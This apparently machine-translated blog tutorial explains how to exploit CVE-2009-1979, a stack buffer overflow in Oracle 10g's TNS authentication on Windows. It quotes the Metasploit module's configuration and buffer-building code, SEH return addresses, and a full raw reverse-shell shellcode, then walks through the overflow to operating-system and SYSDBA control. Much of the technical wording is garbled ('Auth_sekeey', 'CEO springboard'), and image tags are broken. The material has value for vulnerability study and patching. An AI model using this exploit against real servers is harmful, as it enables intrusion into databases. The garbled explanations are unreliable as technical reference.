Oracletns exploits Oracle's operating system to invade Oracle

Background

With the development of the database intrusion method, the attack on the database is not only for the database itself, but extends to the various building of the database (even middleware).

As one of the core components of Oracle, TNS (transparance Network substrate) is primarily responsible for selecting the Oracle Protocol configurator to identify a transport protocol that is supported by both the client and the server. TNS not only defines the communication protocol between the database and the client, but is also responsible for authenticating the client (confirming that the user name and password used by the client are legitimate). Simply put, if TNS has an exploit, it could be a direct intrusion to Oracle. There are 3 ways to use TNS to invade Oracle: 1. Hijack the TNS message, hijacking the Oracle login information to the attacker's machine, obtaining sensitive information, and even obtaining the Oracle Administrator account password. Please refer to An Huaqin and database Security Lab for "Oracle Database vulnerability without USER/PASSWORD fast intrusion" article. 2. Directly decrypt the Oracle login key that is encrypted in TNS please refer to An Huaqin and database Security Lab for the article "See Recruit, Break Oracle password". 3. Through buffer overflow, the Oracle local operating system CONTROL permission is obtained when Oracle invokes the abnormal TNS parameter.

This article will specifically describe mode 3, which exploits a buffer vulnerability on TNS to invade Oracle's operating system. The example used is cve-2009-1979. Draw on the vulnerability of the original author's attack code, using Metasploit as an attack tool, a WIN2003SP1 on the oracle10g2.0.1.0 attack.

Vulnerability description

cve-2009-1979 (original author code http://www.securityfocus.com/archive/1/507598) The flaw is simply: After the client and server determine the authentication mechanism to use. Perform O3logon authentication (the protocol is for the client to prove to the database that the client has a legitimate key) every time the database is logged in, the O3logon protocol will go. In this protocol, after the client obtains the Auth_sekeey from the database, it sends a corresponding auth_sekeey and Auth_password to the database. oracle10g1.0.5 to 10.2.04 in these versions, the Auth_sekeey sent by the client is not reasonably limited by the length of the content. Causes the injection point to become a buffer overflow. A normal auth_sekeey length is 64 bits (as shown). If the auth_sekeey is longer than 64 bits, it is possible to modify the memory variables near Auth_sekeey. Cause unpredictable results to occur.

650) this.width=650; "Name=" image_operate_77561425973627045 "width=" 520 "height=" "title=" Oracletns exploits Oracle's operating system to invade Oracle's "alt=" Oracletns exploits Oracle's operating system to invade Oracle "src=" http://s3.sinaimg.cn/mw690 /001t9c8mzy6qayvlxxgd2&690 "/>

It is not enough to know that there is an injection point in the Auth_sekeey, and it is necessary to understand further how auth_sekeey is stored in memory in order to be able to use this injection point in a targeted manner. Since Auth_sekeey is a parameter that TNS receives, the way auth_sekeey is stored in memory is closely related to how TNS stores messages. The client sends packets to the server side through multiple layers of software. For the sake of understanding we make this process a simplification. Starting from the client information is passed to the client local TNS, the client local TNS formats this information and sends it to the operating system protocol stack. The operating system protocol stack passes this information to the server's protocol stack over the network: The message is then passed to TNS, and eventually Oracle invokes the information passed in TNS. This process can be roughly seen as being done in the system stack. So you can basically think of cve-2009-1979 as a buffer stack overflow vulnerability. Stack buffer overflow attack with Auth_sekeey value length exception. The buffer stack overflow principle can be referenced in the article "Windows Buffer overflow principle (Stack)" published by An Huaqin and the database Security lab.

Code explanation

For a more detailed explanation of the specific mechanism of the vulnerability, refer directly to the code on the Metasploit on the vulnerability. The Code body structure is:

Require ' Msf/core '

Class Metasploit3 < Msf::exploit::remote

Rank = greatranking

Include Msf::exploit::remote::tns

Include Msf::exploit::remote::seh

def initialize (info = {})

def check

def exploit

...........

End

The core functions are only initialize () and exploit two. Initialize is primarily used to describe exploits. Exploit is used to truly buffer overflow attacks. Placing other functions is not part of the key function, so this article does not describe.

The core code for initialize is:

' Defaultoptions ' =

{

' Exitfunc ' = ' seh ',

},

' Payload ' =

{

' Space ' = 0x17e,

' Badchars ' = ' ", # None, thx memcpy!

' Stackadjustment ' =-3500,

},

' Platform ' = ' win ',

' Targets ' =

[

[' Automatic ', {}],

[' Oracle 10.2.0.1.0 Enterprise Edition ',

{

# untested

' Ret ' = 0x011b0528 # p/p/r in Oracle.exe v10.2.0.3

}

],

[' Oracle 10.2.0.4.0 Enterprise Edition ',

{

# tested Ok-2010-jan-20-jduck

' Ret ' = 0x01347468 # p/p/r in Oracle.exe v10.2.0.3

}

]

],

' Defaulttarget ' = 0,

' Disclosuredate ' = ' Oct 20 2009 ')

The Initialize function describes the condition in which the vulnerability is exploited (the key focus for the red spot in the figure), which is described as an Seh method that exploits the buffer stack overflow. The payload here refers to the pure shellcode, not the entire string injected into the injection point (this is the value that makes up the Auth_sesskey). It is particularly pointed out that the space covered by shellcode in the entire stack is limited to 382 bytes. Badchars is the limit character that is used to populate empty directives. There are no restrictions on padding characters on win2003 (there is a limit to prevent the padding characters from damaging shellcode, with different fill characters for each instruction set.) Platform description requires operating system for win series. This is because the structure of different operating system stacks, the level of protection against stack buffer overflow is different (even if the same operating system under different patches of the API base address also has a change in the buffer attack caused a significant impact) targets refers to the database version number available for attack and the most critical pop/of the Seh method Pop/ret address. In this example, orcale10.2.0.1.0 is used, so the Pop/pop/ret address is 0x011b0528. The most critical 3 points of Initialize are: 1. Indicates the maximum length of the shellcode. 2. The corresponding version of Oracle's Pop/pop/ret address for SEH is indicated. 3 The buffer overflow padding character is limited to prevent Sploit from being destroyed by the filled character.

Exploit function Core code:

#伪造客户端给数据库发送的前6个包

# Build Exploit Buffer

Print_status ("Calling Kpoauth with long auth_sesskey ...")

Sploit = payload.encoded 1

Sploit << rand_text_alphanumeric (0x1aa-0x17e) 2

Sploit << Generate_seh_record (Mytarget.ret) 3

Distance = Payload_space + 0x2D

Sploit<<metasm::shellcode.assemble (metasm::ia32.new, "jmp$-" + 4

distance.to_s). encode_string

The Expliot function is primarily responsible for 2 tasks:

1. Forge an Oracle client to send a packet to a real database until it is sent to a packet containing a auth_sesskey string. Is the forgery of the packet, exploit forged is the IP 10.10.10.128 client. 10.10.10.130 is the target database to invade.

650) this.width=650; "Name=" image_operate_16211425973482194 "width=" 520 "height=" "title=" Oracletns exploits Oracle's operating system to invade Oracle's "alt=" Oracletns exploits Oracle's operating system to invade Oracle "src=" http://s13.sinaimg.cn/ mw690/001t9c8mzy6qaz5vn9i2c&690 "/>

2. Create buffer overflow sploit (build exploit buffer), first give the overall structure of the manufacturing buffer overflow: shellcode script + random address + short Springboard + return address + long springboard. The following lines are described below:

First line: Sploit = payload.encoded

Deposit Shellcode. The function of this shellcode is to get the operating system permissions of the attacked machine directly. The code is as follows:

"\XFC\XE8\X89\X00\X00\X00\X60\X89\XE5\X31\XD2\X64\X8B\X52\X30\X8B"

"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"

"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57"

"\X8B\X52\X10\X8B\X42\X3C\X01\XD0\X8B\X40\X78\X85\XC0\X74\X4A\X01"

"\XD0\X50\X8B\X48\X18\X8B\X58\X20\X01\XD3\XE3\X3C\X49\X8B\X34\X8B"

"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4"

"\X03\X7D\XF8\X3B\X7D\X24\X75\XE2\X58\X8B\X58\X24\X01\XD3\X66\X8B"

"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24"

"\X5B\X5B\X61\X59\X5A\X51\XFF\XE0\X58\X5F\X5A\X8B\X12\XEB\X86\X5D"

"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07"

"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00"

"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff"

"\xd5\x97\x6a\x05\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6"

"\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff"

"\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56"

"\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00"

"\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"

"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75"

"\xec\xc3"

Shellcode is simply a piece of code that is implanted into the process for buffer overflow attacks, most of which are written in assembly language. The shellcode itself is divided into Jump/call, pop return, push return, Jmp[reg+offset], blind return, SEH and many other types according to the way of jumping. As the focus of this article is not discussed in Shellcode. So this is skipped here, will be in the future to fill the article shellcode specifically. The shellcode of this article is in the way of SEH.

Second line: Sploit << rand_text_alphanumeric (0x1aa-0x17e)

Generates a random number that fills the destination address to the source address. The main reason for using random numbers instead of a fixed string of characters is to prevent the program from being processed by certain protection mechanisms and to cause the experiment to fail. TNS receives the data and checks it in the function KPZGKVL in Oracommon10.dll. After checking with the data intel_fast_memcpy (this function is compiled when Intel has optimized the instruction to memcpy, instead of the memcpy function) copy to Oracle processing. The same Auth_sesskey value also goes through the process. The overflow point appears in the copy function. The source address of the copy is 04AB99A4, the destination address is 0x0673db96 (all addresses appearing in this article are just the address of the author's Win2003sp1, the address of the operating system with different patches will change), and the most recent SEH address is 0X0673DD40. The Auth_sesskey value stored in address 04ab99a4 is copied to the address 0x0673db96 by intel_fast_memcpy. There is no length judgement on the auth_sesskey value stored in the 04AB99A4, and a buffer overflow occurs after copying to 0x0673db96 and overwriting to the 0X0673DD40 (SEH address). If you want the value of Auth_sesskey to be overwritten from address 0x0673db96 to address 0X0673DD40, you will need to enter 426 (0X1AA) characters. It is only possible to enter a 426-length string at this point in 04ab99a4. The initialize of this vulnerability indicates that shellcode space is 382 (0x17e). The overwrite requirement is not met, so it is necessary to fill with (0x1aa-0x17e) characters to make sure it overwrites to Seh (0X0673DD40). To clarify why you want to overwrite the 0X0673DD40, here is a small subset of the SEH associated with this example.

SEH is the exception-handling mechanism for Windows. The exception handling of any program is inherently SEH-installed. Multiple SEH is allowed in one thread. If no exception handling is done in one thread. Windows will also create a system-level SEH at the beginning of the thread creation by system functions (when all SEH cannot handle the exception, the system function will eventually be called to handle the exception.) The result is a popup dialog, forcing the program to close.

In one stack each seh size is 8 bytes, there are 2 4-byte members, the low address bits are stored as pointers to the next Seh-linked list, and the high address bits store the exception handler address. When an exception occurs, a pointer to the SEH chain is read from the TEB (thread environment block), and the from near is accessed one by one from the exception trigger, and is handled by the SEH if the nearest SEH can handle the exception. If it cannot be processed, it jumps to the next seh along the Seh chain. And so on until exception handling. The bottom of the last Seh chain is ffffffff. The last Seh is a thread that starts the system-created SEH.

650) this.width=650; "Name=" image_operate_49671425973558943 "width=" 402 "height=" 313 "title=" Oracletns exploits Oracle's operating system to invade Oracle's "alt=" Oracletns exploits Oracle's operating system to invade Oracle "src=" http://s2.sinaimg.cn/mw690 /001t9c8mzy6qazbhfwh21&690 "/>

A buffer overflow Seh method is to use a string to overwrite the distance in the Seh chain, the most recent seh of the exception trigger point. Overwrite the SEH handle (0X0673DD44) address into the Pop/pop/ret type (0x11b0528). Cheat SEH Handle Execution Pop/pop/ret, process red will put pointer to next SEH Rerord address into the EIP eventually RET will jump out into pointer to next SEH Rerord. The process is: When the exception is triggered, the exception automatically creates a stack frame itself. It pushes the SEH handle member into the newly created stack frame. There is one field in the SEH structure that is establisherframe. This field points to the exception management registration record, the address of pointer to next SEH Rerord is pressed into the stack, and the value that is pressed in is located in the esp+8 position. Pop/pop/ret string Overlay Seh handle after the first pop pop stack top 4bytes, the next pop continues to be ejected from the stack 4bytes. Finally RET will put the value (pointer to next SEH Rerord) in the top of the stack at this time ESP into the EIP. So the Pop/pop/ret-covered SEH handle will jump back pointer to next SEH Rerord.

Since pointer to next SEH Rerord is rewritten into EB 06 + 2 random characters (rounding up a line), the following rewritten SEH handle will be skipped. Executes the content behind the SEH handle. If the following content is Shellcode or a jump pointer to shellcoded, then jumping into shellcode starts executing shellcode.

The third line. Sploit << Generate_seh_record (Mytarget.ret)

The function Generate_seh_record generates 2 rows of short springboard covering pointer to next Seh Rerord (including EB 06, two random characters (4 bytes)) and the return address covering SEH handle (pop/pop/ RET type 0x11b0528) to complete the process of overwriting SEH jumps to shellcode or the next springboard.

Line Four

Sploit<<metasm::shellcode.assemble (metasm::ia32.new, "jmp$-" +distance.to_s). encode_string

This sentence is a long springboard. jmp$-indicates that a negative jump (by memory low address jumps back to memory high address) sets the long springboard located from pointer to next SEH Rerord skips over Seh Hande, the CEO springboard jumps back to the start address of Sploit and begins execution shellcode.

The entire SPLOIT structure is shellcode+ random fill value + short Springboard +pop/pop/ret address + long springboard (jumping back to the very beginning) shellcode. Finally, assign this value to Auth_sesskey and send the packet containing Auth_sesskey to the database. At this point, in order to effect more intuitive, run a script on the intrusion Machine open remote connection directly with Sqlplus/as SYSDBA log on to the intrusion machine database to complete the attack. The effect is as follows:

650) this.width=650; "Name=" image_operate_15221425973754528 "width=" 520 "height=" 231 "title=" Oracletns exploits Oracle's operating system to invade Oracle's "alt=" Oracletns exploits Oracle's operating system to invade Oracle "src=" http://s11.sinaimg.cn/ mw690/001t9c8mzy6qazj67bq9a&690 "/>

This vulnerability cve-2009-1979 is complete. The An Huaqin and database Security labs will share with you in the next article the classification, usage, scope limitations, and so on, of the shellcode that have been skipped in this paper.

This article is from the Database security blog, so be sure to keep this source http://schina.blog.51cto.com/9734953/1619035

Oracletns exploits Oracle's operating system to invade Oracle